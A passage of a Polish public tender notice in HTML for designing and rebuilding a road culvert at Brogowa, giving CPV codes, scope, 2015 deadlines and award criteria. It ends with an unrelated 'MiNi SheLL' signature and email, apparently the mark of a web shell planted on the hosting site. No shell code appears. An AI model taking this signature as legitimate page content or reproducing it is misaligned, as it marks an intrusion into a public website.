Etap II - Wykonanie robót budowlanych na podstawie opracowanej dokumentacji technicznej, przewidzianych do realizacji do dnia 30.10.2015r. 
Podstawę do sporządzenia dokumentacji projektowej i realizacji robót budowlanych będących przedmiotem niniejszego Zamówienia stanowią warunki i wymagania zawarte w niniejszym Programie Funkcjonalno-Użytkowym oraz obowiązujące przepisy prawne regulujące uzyskanie niezbędnych zezwoleń, pozwoleń, zgód i uzgodnień oraz realizację robót budowlanych zgodnie z prawem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.23.32.22-1, 45.10.00.00-8, 45.23.32.20-7, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - Zaprojektowanie i przebudowa przepustu w ciągu drogi powiatowej Nr 3311W Rusinów - Brogowa - Janików w km 5+116 w m. Brogowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 2 - Zaprojektowanie i przebudowa przepustu w ciągu drogi powiatowej Nr 3311W Rusinów - Brogowa - Janików w km 5+116 w m. Brogowa

KOD CPV:
71320000  - 7 -  usługi inżynieryjne w zakresie projektowania 
45100000  - 8 -  przygotowanie terenu pod budowę
45110000  - 1 -  roboty rozbiórkowe     
45221111  - 3 -  roboty budowlane w zakresie mostów drogowych
45233220  - 7 -  roboty w zakresie nawierzchni dróg
45233290  - 8 -  oznakowanie dróg i urządzenia bezpieczeństwa ruchu

Zamówienie obejmuje:
a) Sporządzenie projektu budowlanego i uzyskanie dla niego wynikających z przepisów opinii, zgód, uzgodnień i pozwoleń wraz z pozwoleniem na budowę; 
b) Sporządzenie projektu wykonawczego i specyfikacji technicznych wykonania i odbioru robót budowlanych; 
c) Wykonanie robót budowlanych zgodnie z powyższymi projektami i specyfikacjami technicznymi wykonania i odbioru robót budowlanych;
d) Przeprowadzenie prób i badań wymaganych dla przepustów drogowych oraz przygotowanie wszystkich niezbędnych dokumentów związanych z oddaniem zbudowanego przepustu do użytkowania;
e) Wszelkie inne roboty jakie okażą się niezbędne dla wykonania przedmiotu zamówienia.
Zadanie dzieli się na dwa etapy: 
Etap I - Sporządzenie projektu budowlanego w zakresie wynikającym z Rozporządzenia Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu oraz przygotowania odpowiednich dokumentów formalno - prawnych i uzyskanie na ich podstawie, w imieniu Zamawiającego, zgody właściwego organu na prowadzenie robót, w oparciu o obowiązujące przepisy (wg wymagań stosownej ustawy) do dnia 31.08.2015r. 
Etap II - Wykonanie robót budowlanych na podstawie opracowanej dokumentacji technicznej, przewidzianych do realizacji do dnia 16.11.2015r. 
Podstawę do sporządzenia dokumentacji projektowej i realizacji robót budowlanych będących przedmiotem niniejszego Zamówienia stanowią warunki i wymagania zawarte w niniejszym Programie Funkcjonalno-Użytkowym, wydanych decyzjach administracyjnych dotyczących przebudowy przepustu oraz obowiązujące przepisy prawne regulujące uzyskanie niezbędnych zezwoleń, pozwoleń, zgód i uzgodnień oraz realizację robót budowlanych zgodnie z prawem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.22.11.11-3, 45.23.32.20-7, 45.10.00.00-8, 45.11.00.00-1, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com